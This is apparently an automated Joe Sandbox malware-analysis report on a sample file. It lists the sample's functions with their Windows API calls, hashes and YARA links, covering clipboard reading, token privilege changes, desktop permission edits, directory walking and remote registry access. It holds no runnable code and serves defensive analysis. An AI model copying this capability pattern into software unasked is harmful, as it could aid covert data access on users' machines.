                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E28915
                                          • GetProcessWindowStation.USER32 ref: 00E2892E
                                          • SetProcessWindowStation.USER32(00000000), ref: 00E28938
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E28952
                                            • Part of subcall function 00E28713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E28851), ref: 00E28728
                                            • Part of subcall function 00E28713: CloseHandle.KERNEL32(?,?,00E28851), ref: 00E2873A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0$winsta0\default
                                          • API String ID: 2063423040-1685893292
                                          • Opcode ID: 8e209e6c9930715203ae2f2821bf3ebd86f58246ba78b32f9877af9f45484973
                                          • Instruction ID: 98a3028e915df32181dd16127311ab417b6ef314be9ba2981ad2009ed1198cf2
                                          • Opcode Fuzzy Hash: 8e209e6c9930715203ae2f2821bf3ebd86f58246ba78b32f9877af9f45484973
                                          • Instruction Fuzzy Hash: C0815EB1902219AFDF11DFA4ED45AEE7BB8EF04309F08552AF910B6161DF718E14DB60
                                          Function 00E4425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenClipboard.USER32(00E5F910), ref: 00E44284
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E44292
                                          • GetClipboardData.USER32(0000000D), ref: 00E4429A
                                          • CloseClipboard.USER32 ref: 00E442A6
                                          • GlobalLock.KERNEL32(00000000), ref: 00E442C2
                                          • CloseClipboard.USER32 ref: 00E442CC
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00E442E1
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00E442EE
                                          • GetClipboardData.USER32(00000001), ref: 00E442F6
                                          • GlobalLock.KERNEL32(00000000), ref: 00E44303
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00E44337
                                          • CloseClipboard.USER32 ref: 00E44447
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                          • String ID:
                                          • API String ID: 3222323430-0
                                          • Opcode ID: 43bb35405b77279efcbc0046c7d651103025cab77904a6860ee7f421637183d2
                                          • Instruction ID: dc2f9b83e629f4951cdde33414c95d25bcb88ff1224c8cfcbc48ee7a8c5c7df3
                                          • Opcode Fuzzy Hash: 43bb35405b77279efcbc0046c7d651103025cab77904a6860ee7f421637183d2
                                          • Instruction Fuzzy Hash: 655190B5304306AFD314AF61EC95F6E77A8AF84B01F00492AF555F22E1DB7099088B62
                                          Function 00E3C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E3C9F8
                                          • FindClose.KERNEL32(00000000), ref: 00E3CA4C
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E3CA71
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E3CA88
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E3CAAF
                                          • __swprintf.LIBCMT ref: 00E3CAFB
                                          • __swprintf.LIBCMT ref: 00E3CB3E
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • __swprintf.LIBCMT ref: 00E3CB92
                                            • Part of subcall function 00DF38D8: __woutput_l.LIBCMT ref: 00DF3931
                                          • __swprintf.LIBCMT ref: 00E3CBE0
                                            • Part of subcall function 00DF38D8: __flsbuf.LIBCMT ref: 00DF3953
                                            • Part of subcall function 00DF38D8: __flsbuf.LIBCMT ref: 00DF396B
                                          • __swprintf.LIBCMT ref: 00E3CC2F
                                          • __swprintf.LIBCMT ref: 00E3CC7E
                                          • __swprintf.LIBCMT ref: 00E3CCCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: bd987d8e7c5e01224fc97484006a6d5991eade8bb0c5ae079b6b504550697380
                                          • Instruction ID: add925122ab78c5fe4c40eb4c1ba9a032339533d62169060082d53d44772ebf6
                                          • Opcode Fuzzy Hash: bd987d8e7c5e01224fc97484006a6d5991eade8bb0c5ae079b6b504550697380
                                          • Instruction Fuzzy Hash: F0A140B2508305ABC710EB64D895DAFB7ECEF94704F40591AF586D3291EB35EA08CB72
                                          Function 00E3F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E3F221
                                          • _wcscmp.LIBCMT ref: 00E3F236
                                          • _wcscmp.LIBCMT ref: 00E3F24D
                                          • GetFileAttributesW.KERNEL32(?), ref: 00E3F25F
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00E3F279
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00E3F291
                                          • FindClose.KERNEL32(00000000), ref: 00E3F29C
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00E3F2B8
                                          • _wcscmp.LIBCMT ref: 00E3F2DF
                                          • _wcscmp.LIBCMT ref: 00E3F2F6
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E3F308
                                          • SetCurrentDirectoryW.KERNEL32(00E8A5A0), ref: 00E3F326
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E3F330
                                          • FindClose.KERNEL32(00000000), ref: 00E3F33D
                                          • FindClose.KERNEL32(00000000), ref: 00E3F34F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: 3da670951356d43b48fe34fed921b30ab92811229b3066e27da0f7dca944a5a6
                                          • Instruction ID: 8781ddb7d95d89640469fc9fa840c8662ab0aabbcb81f74cd08531b73d7cdbb4
                                          • Opcode Fuzzy Hash: 3da670951356d43b48fe34fed921b30ab92811229b3066e27da0f7dca944a5a6
                                          • Instruction Fuzzy Hash: F031B276900319AFDB14EBB5DC5CAEE7BAC9F08366F145576E904F30A0EB30DA45CA60
                                          Function 00E50AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50BDE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E5F910,00000000,?,00000000,?,?), ref: 00E50C4C
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E50C94
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E50D1D
                                          • RegCloseKey.ADVAPI32(?), ref: 00E5103D
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E5104A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: fb8c65c04fa6c56d261989af273a5746847aae1609e5e90320c4de821d9b18c5
                                          • Instruction ID: c5d5238b1c10ba9e187ff4391f4d5e469cef89d6676904ab778629285327c321
                                          • Opcode Fuzzy Hash: fb8c65c04fa6c56d261989af273a5746847aae1609e5e90320c4de821d9b18c5
                                          • Instruction Fuzzy Hash: D0026F752006119FCB14EF24C895E2AB7E5FF88714F05985DF889AB3A2CB31ED45CBA1
                                          Function 00E5C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • DragQueryPoint.SHELL32(?,?), ref: 00E5C917
                                            • Part of subcall function 00E5ADF1: ClientToScreen.USER32(?,?), ref: 00E5AE1A
                                            • Part of subcall function 00E5ADF1: GetWindowRect.USER32(?,?), ref: 00E5AE90
                                            • Part of subcall function 00E5ADF1: PtInRect.USER32(?,?,00E5C304), ref: 00E5AEA0
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E5C980
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E5C98B
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E5C9AE
                                          • _wcscat.LIBCMT ref: 00E5C9DE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E5C9F5
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E5CA0E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E5CA25
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E5CA47
                                          • DragFinish.SHELL32(?), ref: 00E5CA4E
                                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00E5CB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                          • API String ID: 2166380349-3440237614
                                          • Opcode ID: 8034cfd0dfdf90b6155f34ab04ac2aab5c4a31e1aebb52e1498369e087538ebf
                                          • Instruction ID: f9b44836e2b3560cf43fa3cb0d91cb59690c61cbe4518a415808000e888f8235
                                          • Opcode Fuzzy Hash: 8034cfd0dfdf90b6155f34ab04ac2aab5c4a31e1aebb52e1498369e087538ebf
                                          • Instruction Fuzzy Hash: 6C617B71108301AFC715EF61DC85D9FBBF8EF88751F00192EF595A22A1DB709A49CB62
                                          Function 00E3F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E3F37E
                                          • _wcscmp.LIBCMT ref: 00E3F393
                                          • _wcscmp.LIBCMT ref: 00E3F3AA
                                            • Part of subcall function 00E345C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E345DC
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00E3F3D9
                                          • FindClose.KERNEL32(00000000), ref: 00E3F3E4
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00E3F400
                                          • _wcscmp.LIBCMT ref: 00E3F427
                                          • _wcscmp.LIBCMT ref: 00E3F43E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E3F450
                                          • SetCurrentDirectoryW.KERNEL32(00E8A5A0), ref: 00E3F46E
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E3F478
                                          • FindClose.KERNEL32(00000000), ref: 00E3F485
                                          • FindClose.KERNEL32(00000000), ref: 00E3F497
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: cb16d194d82fbf5aba3dffa23ae6101bfcdd68f5a0e17a80f3504148ef1322c1
                                          • Instruction ID: b1b203a56f90b60b1f0d6e486001929a72f4957dffe4734b4c35cb329493e166
                                          • Opcode Fuzzy Hash: cb16d194d82fbf5aba3dffa23ae6101bfcdd68f5a0e17a80f3504148ef1322c1
                                          • Instruction Fuzzy Hash: 0F31E7729012196FDB10AF64EC8CAEF7BAC9F49325F145175E924B30A0D731DE48CA60
                                          Function 00E5C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E5C4EC
                                          • GetFocus.USER32 ref: 00E5C4FC
                                          • GetDlgCtrlID.USER32(00000000), ref: 00E5C507
                                          • _memset.LIBCMT ref: 00E5C632
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E5C65D
                                          • GetMenuItemCount.USER32(?), ref: 00E5C67D
                                          • GetMenuItemID.USER32(?,00000000), ref: 00E5C690
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E5C6C4
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E5C70C
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E5C744
                                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00E5C779
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 3616455698-4108050209
                                          • Opcode ID: 6bec600c834df8dc96d5a5bdbea63822ce955063e09063b469a3fbe2caf8b0dc
                                          • Instruction ID: 1f4b26748acbd306f80436c739abe2149612f13bc667d1615891cc6996f1685b
                                          • Opcode Fuzzy Hash: 6bec600c834df8dc96d5a5bdbea63822ce955063e09063b469a3fbe2caf8b0dc
                                          • Instruction Fuzzy Hash: 96819F702083019FD714CF25C894A6BBBE4FB8875AF20592EFD95A7291D770D909CFA2
                                          Function 00E281F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E2874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E28766
                                            • Part of subcall function 00E2874A: GetLastError.KERNEL32(?,00E2822A,?,?,?), ref: 00E28770
                                            • Part of subcall function 00E2874A: GetProcessHeap.KERNEL32(00000008,?,?,00E2822A,?,?,?), ref: 00E2877F
                                            • Part of subcall function 00E2874A: RtlAllocateHeap.NTDLL(00000000,?,00E2822A), ref: 00E28786
                                            • Part of subcall function 00E2874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E2879D
                                            • Part of subcall function 00E287E7: GetProcessHeap.KERNEL32(00000008,00E28240,00000000,00000000,?,00E28240,?), ref: 00E287F3
                                            • Part of subcall function 00E287E7: RtlAllocateHeap.NTDLL(00000000,?,00E28240), ref: 00E287FA
                                            • Part of subcall function 00E287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E28240,?), ref: 00E2880B
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E2825B
                                          • _memset.LIBCMT ref: 00E28270
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E2828F
                                          • GetLengthSid.ADVAPI32(?), ref: 00E282A0
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E282DD
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E282F9
                                          • GetLengthSid.ADVAPI32(?), ref: 00E28316
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E28325
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E2832C
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E2834D
                                          • CopySid.ADVAPI32(00000000), ref: 00E28354
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E28385
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E283AB
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E283BF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 2347767575-0
                                          • Opcode ID: 1fc6e8330d2b53dab778e41915356020e07b29e4982cb5c411117b4303b42287
                                          • Instruction ID: 5abbfe10bf6f9df524b6386e7a259a4c940fc04ef280a9ad9bbde9471e76cf32
                                          • Opcode Fuzzy Hash: 1fc6e8330d2b53dab778e41915356020e07b29e4982cb5c411117b4303b42287
                                          • Instruction Fuzzy Hash: CA616771901219EFCF04DFA1EE84AEEBBB9FF04705F089529E815B7291DB309A05CB60
                                          Function 00DE6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                          • API String ID: 0-4052911093
                                          • Opcode ID: 39294c78fd5f53737c2c285a49cd3bfd59c869d563960668fcce507da856417a
                                          • Instruction ID: 762547661662dce4a79470bc6ee5f1d124b970e17f2edf1bcf1edf9e5424224e
                                          • Opcode Fuzzy Hash: 39294c78fd5f53737c2c285a49cd3bfd59c869d563960668fcce507da856417a
                                          • Instruction Fuzzy Hash: 44728471E002699BDB14DF59D8807ADB7B5FF94350F1491AAE849FB280D770DE81CBA0
                                          Function 00E50665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E50038,?,?), ref: 00E510BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50737
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E507D6
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E5086E
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E50AAD
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E50ABA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
